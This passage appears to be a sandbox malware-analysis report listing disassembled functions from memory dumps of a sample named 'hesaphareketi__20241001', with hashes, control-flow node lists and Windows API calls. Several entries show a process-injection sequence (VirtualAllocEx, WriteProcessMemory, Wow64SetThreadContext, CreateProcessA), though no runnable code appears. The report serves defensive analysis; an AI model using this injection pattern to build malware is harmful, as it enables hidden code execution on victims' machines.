                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 914cdcd49152c8e0c6c0199c7f26dadd4f558bf43100b64d3bbe7ecfb18dd5ca
                                        • Instruction ID: 315373049c24db0a74c5b4ee319e672c8403cfd2d0c47b93ad8031e5b62f430c
                                        • Opcode Fuzzy Hash: 914cdcd49152c8e0c6c0199c7f26dadd4f558bf43100b64d3bbe7ecfb18dd5ca
                                        • Instruction Fuzzy Hash: 4B21D4B0E006588BEB18CFAAD8447DEBBF3AFC8300F14C16AD409A6258DB755945CF50
                                        Function 0757EC18 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3d877d451a7cf2c52ea9c71e5dee881c29c9e6a54e150f5696b363cb9756fb4
                                        • Instruction ID: 022d41b7207ea9928b8f29fcb3481ac53a951b6d3305cbf83148662e590d584b
                                        • Opcode Fuzzy Hash: b3d877d451a7cf2c52ea9c71e5dee881c29c9e6a54e150f5696b363cb9756fb4
                                        • Instruction Fuzzy Hash: 91214DB1D156198BDB18CF67D8046EEFFBBBFCA311F04C16AD40966295DB300546DB90
                                        Function 0757DC96 Relevance: 2.8, Strings: 2, Instructions: 259COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 317 757dc96-757dce2 319 757dce4 317->319 320 757dce9-757dcf7 317->320 319->320
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 64b294c581f2f059209a5a893ced9b8204f3e1f1f578fe8c4dd50acd43b2e092
                                        • Instruction ID: 9687e6fb32205d2f6095f885e51e68a217072dc836f8572ef45440e0a28c386e
                                        • Opcode Fuzzy Hash: 64b294c581f2f059209a5a893ced9b8204f3e1f1f578fe8c4dd50acd43b2e092
                                        • Instruction Fuzzy Hash: 7191A0B5E083498FCB05CFA8D8846EDBFF5BF4A310F1481AAD858AB356DB315905CB91
                                        Function 0757DD70 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 392 757dd70-757dd93 394 757dd95 392->394 395 757dd9a-757dedf 392->395 394->395 443 757ddf7 call 757e4e7 395->443 444 757ddf7 call 757e538 395->444 445 757ddf7 call 757e528 395->445 407 757ddfd-757dec0 411 757de27-757de2b 407->411 412 757de33-757df81 call 757dd08 411->412 413 757de2d-757df54 411->413 424 757df87 412->424 425 757dde2-757dde7 412->425 429 757df56 call 757ecb6 413->429 430 757df56 call 757ef15 413->430 431 757df56 call 757ecd5 413->431 432 757df56 call 757ee5f 413->432 433 757df56 call 757f4ff 413->433 434 757df56 call 757ed58 413->434 435 757df56 call 757ec18 413->435 436 757df56 call 757ed45 413->436 437 757df56 call 757f2a2 413->437 438 757df56 call 757f102 413->438 439 757df56 call 757ed81 413->439 440 757df56 call 757eca0 413->440 441 757df56 call 757f268 413->441 442 757df56 call 757ec28 413->442 425->411 427 757dde9-757ddea 425->427 427->411 428 757df5c-757df66 429->428 430->428 431->428 432->428 433->428 434->428 435->428 436->428 437->428 438->428 439->428 440->428 441->428 442->428 443->407 444->407 445->407
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: bbefda2ce69e45b440522abfde25ce6ab704829ae2f53d7134efa05b0755d7d1
                                        • Instruction ID: 2a1b54c0b51e59ea3654860e886a6da4fe7f0b22e13c15c2d34aaa8f9745e647
                                        • Opcode Fuzzy Hash: bbefda2ce69e45b440522abfde25ce6ab704829ae2f53d7134efa05b0755d7d1
                                        • Instruction Fuzzy Hash: EE61E3B4E14209CFDB08DFA9D584AEDBBF6FF89300F10942AE909AB355DB315946CB50
                                        Function 0757DD62 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 446 757dd62-757dd6e 447 757dd75-757dd93 446->447 448 757dd70-757dd74 446->448 449 757dd95 447->449 450 757dd9a-757dedf 447->450 448->447 449->450 498 757ddf7 call 757e4e7 450->498 499 757ddf7 call 757e538 450->499 500 757ddf7 call 757e528 450->500 462 757ddfd-757dec0 466 757de27-757de2b 462->466 467 757de33-757df81 call 757dd08 466->467 468 757de2d-757df54 466->468 479 757df87 467->479 480 757dde2-757dde7 467->480 484 757df56 call 757ecb6 468->484 485 757df56 call 757ef15 468->485 486 757df56 call 757ecd5 468->486 487 757df56 call 757ee5f 468->487 488 757df56 call 757f4ff 468->488 489 757df56 call 757ed58 468->489 490 757df56 call 757ec18 468->490 491 757df56 call 757ed45 468->491 492 757df56 call 757f2a2 468->492 493 757df56 call 757f102 468->493 494 757df56 call 757ed81 468->494 495 757df56 call 757eca0 468->495 496 757df56 call 757f268 468->496 497 757df56 call 757ec28 468->497 480->466 482 757dde9-757ddea 480->482 482->466 483 757df5c-757df66 484->483 485->483 486->483 487->483 488->483 489->483 490->483 491->483 492->483 493->483 494->483 495->483 496->483 497->483 498->462 499->462 500->462
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: cc15b9cfb7d5a27b5a278946af337e6a303acb855df22fee88055a9890666493
                                        • Instruction ID: 0f688e2393ee581f84210f3119f4d54352e76e20124912b82764b86b51e56e74
                                        • Opcode Fuzzy Hash: cc15b9cfb7d5a27b5a278946af337e6a303acb855df22fee88055a9890666493
                                        • Instruction Fuzzy Hash: AA51F6B4E14209CFDB08CFE9D884AEDBBB6FF89300F10902AD909AB355DB315946CB50
                                        Function 07A349E4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 800 7a349e4-7a34a85 802 7a34a87-7a34a91 800->802 803 7a34abe-7a34ade 800->803 802->803 804 7a34a93-7a34a95 802->804 808 7a34ae0-7a34aea 803->808 809 7a34b17-7a34b46 803->809 805 7a34a97-7a34aa1 804->805 806 7a34ab8-7a34abb 804->806 810 7a34aa3 805->810 811 7a34aa5-7a34ab4 805->811 806->803 808->809 812 7a34aec-7a34aee 808->812 819 7a34b48-7a34b52 809->819 820 7a34b7f-7a34c39 CreateProcessA 809->820 810->811 811->811 813 7a34ab6 811->813 814 7a34b11-7a34b14 812->814 815 7a34af0-7a34afa 812->815 813->806 814->809 817 7a34afe-7a34b0d 815->817 818 7a34afc 815->818 817->817 821 7a34b0f 817->821 818->817 819->820 822 7a34b54-7a34b56 819->822 831 7a34c42-7a34cc8 820->831 832 7a34c3b-7a34c41 820->832 821->814 824 7a34b79-7a34b7c 822->824 825 7a34b58-7a34b62 822->825 824->820 826 7a34b66-7a34b75 825->826 827 7a34b64 825->827 826->826 829 7a34b77 826->829 827->826 829->824 842 7a34cca-7a34cce 831->842 843 7a34cd8-7a34cdc 831->843 832->831 842->843 846 7a34cd0 842->846 844 7a34cde-7a34ce2 843->844 845 7a34cec-7a34cf0 843->845 844->845 847 7a34ce4 844->847 848 7a34cf2-7a34cf6 845->848 849 7a34d00-7a34d04 845->849 846->843 847->845 848->849 850 7a34cf8 848->850 851 7a34d16-7a34d1d 849->851 852 7a34d06-7a34d0c 849->852 850->849 853 7a34d34 851->853 854 7a34d1f-7a34d2e 851->854 852->851 855 7a34d35 853->855 854->853 855->855
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A34C26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 21fcaf66e30240784f092cae3a634b0e3ab19618066a033af655e76fb8033edf
                                        • Instruction ID: e6fa2b39ec39a7acfff29d111bd8d30335cb707e6ac9b51cb4213bd0c545bb54
                                        • Opcode Fuzzy Hash: 21fcaf66e30240784f092cae3a634b0e3ab19618066a033af655e76fb8033edf
                                        • Instruction Fuzzy Hash: 3AA16FB1D0025ADFDB14DFA8C8417EDBBB2FF88314F14816AE829A7250D7749985CF92
                                        Function 07A349F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 857 7a349f0-7a34a85 859 7a34a87-7a34a91 857->859 860 7a34abe-7a34ade 857->860 859->860 861 7a34a93-7a34a95 859->861 865 7a34ae0-7a34aea 860->865 866 7a34b17-7a34b46 860->866 862 7a34a97-7a34aa1 861->862 863 7a34ab8-7a34abb 861->863 867 7a34aa3 862->867 868 7a34aa5-7a34ab4 862->868 863->860 865->866 869 7a34aec-7a34aee 865->869 876 7a34b48-7a34b52 866->876 877 7a34b7f-7a34c39 CreateProcessA 866->877 867->868 868->868 870 7a34ab6 868->870 871 7a34b11-7a34b14 869->871 872 7a34af0-7a34afa 869->872 870->863 871->866 874 7a34afe-7a34b0d 872->874 875 7a34afc 872->875 874->874 878 7a34b0f 874->878 875->874 876->877 879 7a34b54-7a34b56 876->879 888 7a34c42-7a34cc8 877->888 889 7a34c3b-7a34c41 877->889 878->871 881 7a34b79-7a34b7c 879->881 882 7a34b58-7a34b62 879->882 881->877 883 7a34b66-7a34b75 882->883 884 7a34b64 882->884 883->883 886 7a34b77 883->886 884->883 886->881 899 7a34cca-7a34cce 888->899 900 7a34cd8-7a34cdc 888->900 889->888 899->900 903 7a34cd0 899->903 901 7a34cde-7a34ce2 900->901 902 7a34cec-7a34cf0 900->902 901->902 904 7a34ce4 901->904 905 7a34cf2-7a34cf6 902->905 906 7a34d00-7a34d04 902->906 903->900 904->902 905->906 907 7a34cf8 905->907 908 7a34d16-7a34d1d 906->908 909 7a34d06-7a34d0c 906->909 907->906 910 7a34d34 908->910 911 7a34d1f-7a34d2e 908->911 909->908 912 7a34d35 910->912 911->910 912->912
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A34C26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: a8c4b17a54bb2c878860d621fe98a359c55b721ff9a9410bf014c32433ac5d05
                                        • Instruction ID: 07c017a5e9f4eadb9e120cdd84ea3603266d7bc72ad544ae1e3076e6d298cd75
                                        • Opcode Fuzzy Hash: a8c4b17a54bb2c878860d621fe98a359c55b721ff9a9410bf014c32433ac5d05
                                        • Instruction Fuzzy Hash: ED917FB1D0025ADFDB24CFA8C8417EDBBB2FF48314F148169E829A7250DB749985CF92
                                        Function 015DADA8 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 914 15dada8-15dadb7 915 15dadb9-15dadc6 call 15da0cc 914->915 916 15dade3-15dade7 914->916 921 15daddc 915->921 922 15dadc8 915->922 918 15dade9-15dadf3 916->918 919 15dadfb-15dae3c 916->919 918->919 925 15dae3e-15dae46 919->925 926 15dae49-15dae57 919->926 921->916 970 15dadce call 15db040 922->970 971 15dadce call 15db030 922->971 925->926 927 15dae59-15dae5e 926->927 928 15dae7b-15dae7d 926->928 930 15dae69 927->930 931 15dae60-15dae67 call 15da0d8 927->931 932 15dae80-15dae87 928->932 929 15dadd4-15dadd6 929->921 933 15daf18-15dafd8 929->933 934 15dae6b-15dae79 930->934 931->934 936 15dae89-15dae91 932->936 937 15dae94-15dae9b 932->937 965 15dafda-15dafdd 933->965 966 15dafe0-15db00b GetModuleHandleW 933->966 934->932 936->937 940 15dae9d-15daea5 937->940 941 15daea8-15daeaa call 15da0e8 937->941 940->941 944 15daeaf-15daeb1 941->944 945 15daebe-15daec3 944->945 946 15daeb3-15daebb 944->946 948 15daec5-15daecc 945->948 949 15daee1-15daeee 945->949 946->945 948->949 950 15daece-15daede call 15da0f8 call 15da108 948->950 955 15daf11-15daf17 949->955 956 15daef0-15daf0e 949->956 950->949 956->955 965->966 967 15db00d-15db013 966->967 968 15db014-15db028 966->968 967->968 970->929 971->929
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 015DAFFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 19a813a9a9c39d389960dd176976d2477cc4dddd60af527c584aed0452ba71ac
                                        • Instruction ID: 6c95d44ed458b0568e5ac648b82d3fb3739ed31bd674749118c13031dcaff9b8
                                        • Opcode Fuzzy Hash: 19a813a9a9c39d389960dd176976d2477cc4dddd60af527c584aed0452ba71ac
                                        • Instruction Fuzzy Hash: 02710F70A00B068FD724DF2ED45479BBBF5FF88204F008A29D58ADBA50DB75E949CB91
                                        Function 015D44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1369 15d44b4-15d59d9 CreateActCtxA 1372 15d59db-15d59e1 1369->1372 1373 15d59e2-15d5a3c 1369->1373 1372->1373 1380 15d5a3e-15d5a41 1373->1380 1381 15d5a4b-15d5a4f 1373->1381 1380->1381 1382 15d5a51-15d5a5d 1381->1382 1383 15d5a60 1381->1383 1382->1383 1384 15d5a61 1383->1384 1384->1384
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 015D59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 873dae7ddfd994ffd7adb0ff734e1dbe190af0fcbd895178a2df02ef53d3c94d
                                        • Instruction ID: 8c2ca019084ab837d572b446a29a032250165b5e16c44a3bc9ad637daebd7cb5
                                        • Opcode Fuzzy Hash: 873dae7ddfd994ffd7adb0ff734e1dbe190af0fcbd895178a2df02ef53d3c94d
                                        • Instruction Fuzzy Hash: AD41F2B0C0072DCBDB24DFA9C884B9EBBF5BF49304F20846AD409AB255DB756945CF91
                                        Function 015D590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1386 15d590c-15d59d9 CreateActCtxA 1388 15d59db-15d59e1 1386->1388 1389 15d59e2-15d5a3c 1386->1389 1388->1389 1396 15d5a3e-15d5a41 1389->1396 1397 15d5a4b-15d5a4f 1389->1397 1396->1397 1398 15d5a51-15d5a5d 1397->1398 1399 15d5a60 1397->1399 1398->1399 1400 15d5a61 1399->1400 1400->1400
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 015D59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 3beb139983e086c7a2e2e16a211391c7bcb7ab77f46a22b32e6b109d691e62cf
                                        • Instruction ID: 308acda0a9669ed0e4d247c7b7aeebd1c2967becfb10d92cac8f657008160890
                                        • Opcode Fuzzy Hash: 3beb139983e086c7a2e2e16a211391c7bcb7ab77f46a22b32e6b109d691e62cf
                                        • Instruction Fuzzy Hash: 404102B0C00719CBDB24CFA9C884BDDBBF5BF49304F20845AD419AB254DB75694ACF51
                                        Function 055D4040 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1402 55d4040-55d407c 1403 55d412c-55d414c 1402->1403 1404 55d4082-55d4087 1402->1404 1410 55d414f-55d415c 1403->1410 1405 55d4089-55d40c0 1404->1405 1406 55d40da-55d4112 CallWindowProcW 1404->1406 1413 55d40c9-55d40d8 1405->1413 1414 55d40c2-55d40c8 1405->1414 1408 55d411b-55d412a 1406->1408 1409 55d4114-55d411a 1406->1409 1408->1410 1409->1408 1413->1410 1414->1413
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 055D4101
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2163631232.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_55d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: b8e747207ce5e93a4abc677fcb9cb8eba5419d72fb74c4374e555e85fe31a8d3
                                        • Instruction ID: 99674a4e8269188ef05b8205a4c6eeb578dcaa006ee1af0a1f4ef427d2d67aeb
                                        • Opcode Fuzzy Hash: b8e747207ce5e93a4abc677fcb9cb8eba5419d72fb74c4374e555e85fe31a8d3
                                        • Instruction Fuzzy Hash: 3541F5B5900309DFCB14CF99C848AAAFBF5FB88314F25C459D519AB321D775A841CFA0
                                        Function 07A34760 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1416 7a34760-7a347b6 1418 7a347c6-7a34805 WriteProcessMemory 1416->1418 1419 7a347b8-7a347c4 1416->1419 1421 7a34807-7a3480d 1418->1421 1422 7a3480e-7a3483e 1418->1422 1419->1418 1421->1422
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A347F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 681d53ddc3ba01124cf0ae18d28ab4757d8d698d7ef7299054a060424ba30b3e
                                        • Instruction ID: 0b4dbb6359ece35dec4beb66c97925e446e158ab89a4c0667bd5b50b59a94561
                                        • Opcode Fuzzy Hash: 681d53ddc3ba01124cf0ae18d28ab4757d8d698d7ef7299054a060424ba30b3e
                                        • Instruction Fuzzy Hash: 972126B59002599FCB10DFA9C985BEEBBF5FF88310F10842AE919A7250C7789954CFA1
                                        Function 07A34768 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A347F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 2def6844cb8085f7dbb8c4f67663092134d8300bfc617c87f1629e24ef3e9861
                                        • Instruction ID: 40c1a91e8b2466381ab4886d05052eb631024c3cb7022ec57d99ba0540fe99aa
                                        • Opcode Fuzzy Hash: 2def6844cb8085f7dbb8c4f67663092134d8300bfc617c87f1629e24ef3e9861
                                        • Instruction Fuzzy Hash: 382148B59003599FCB10DFAAC885BEEBBF5FF48310F10842AE919A7240C7789944CFA1
                                        Function 07A34191 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A34216
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 1e3c65f5f4d72233586f864390b1dd895f4e3dca29badcbc540e007d97e7fb0b
                                        • Instruction ID: 15059b338c9c70afcfffb70137f5d1113eda9549a217d9287fe4afad8ea5b81a
                                        • Opcode Fuzzy Hash: 1e3c65f5f4d72233586f864390b1dd895f4e3dca29badcbc540e007d97e7fb0b
                                        • Instruction Fuzzy Hash: 222137B1D002498FDB10DFAAC485BEEBBF5EF88314F24842AD559A7240C7789945CFA1
                                        Function 07A34851 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A348D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 058017990b2b8fed13305716eab2dc9d1048ff16c2fe101c14a73f9a7258b3cd
                                        • Instruction ID: 0cd47db811b04d0bd84956cd30d8d636f8111fcb92a19a629af3ab196b318bb2
                                        • Opcode Fuzzy Hash: 058017990b2b8fed13305716eab2dc9d1048ff16c2fe101c14a73f9a7258b3cd
                                        • Instruction Fuzzy Hash: 722125B5C002599FCB10DFAAC880AEEFBF5FF4C310F10842AE959A7250C7789941DBA1
                                        Function 015DD27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015DD656,?,?,?,?,?), ref: 015DD717
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 5cbbbb4ac530eef6c82734bded7f894a0a74a0a01d32612906aba1379bfc116a
                                        • Instruction ID: 4b71204f41eb81b8e40ed4b81803b9e0afcd535da61b5347297167a0b3163fc7
                                        • Opcode Fuzzy Hash: 5cbbbb4ac530eef6c82734bded7f894a0a74a0a01d32612906aba1379bfc116a
                                        • Instruction Fuzzy Hash: 3921E4B5901248DFDB10CF9AD584AEEBFF8FB48310F14845AE918A7350D378A950CFA5
                                        Function 07A34198 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A34216
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 8537467df0792f79651ea772592559efea5e4bf0b6d8bab9b1fc44303c172e68
                                        • Instruction ID: e0a48299299d49afc830ce4c232d1daf8f2cb8f6dc2ab2e42c33b32b75d5af54
                                        • Opcode Fuzzy Hash: 8537467df0792f79651ea772592559efea5e4bf0b6d8bab9b1fc44303c172e68
                                        • Instruction Fuzzy Hash: 392115B1D002498FDB10DFAAC485BEEBBF5FF89314F14842AD519A7240CB78A945CFA1
                                        Function 07A34858 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A348D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 603b449bc3fbe6daacc3598e779ea290a30556e587b09078038541ac6bca750c
                                        • Instruction ID: eb883b89fd69e9c215941c8ced1f2a7c39f382edcf7fbbad7814124e1753e46b
                                        • Opcode Fuzzy Hash: 603b449bc3fbe6daacc3598e779ea290a30556e587b09078038541ac6bca750c
                                        • Instruction Fuzzy Hash: 872118B1C003599FCB10DFAAC885AEEFBF5FF48310F50842AE519A7250C778A945DBA1
                                        Function 015DD689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015DD656,?,?,?,?,?), ref: 015DD717
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 6fec0744cab6f828319834727b83911ad0729e2321b2c9d22dba499046d19bd1
                                        • Instruction ID: 8e293eb9ac5c2e15f9b90207c841d0c17abfb2bd83f2263c195de1d89cc51f75
                                        • Opcode Fuzzy Hash: 6fec0744cab6f828319834727b83911ad0729e2321b2c9d22dba499046d19bd1
                                        • Instruction Fuzzy Hash: 7B21E3B59012489FDB10CF99D584ADEBBF5FB48314F14841AE918B7250C378A944CFA1
                                        Function 07A346A0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A34716
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 9a07fcf1105e65ac87df062d132fba6332855854cc617e6c10e4f28356c9caa5
                                        • Instruction ID: 7a0e7a79a18860f56f6af37e96d2ed97a49b9177f7c4baafe06e7b3b22c2e078
                                        • Opcode Fuzzy Hash: 9a07fcf1105e65ac87df062d132fba6332855854cc617e6c10e4f28356c9caa5
                                        • Instruction Fuzzy Hash: 2E1156B58002498FCB10DFA9D844BEEBFF5EF98310F24881AE519A7250C7799541CFA1
                                        Function 07A33CA8 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
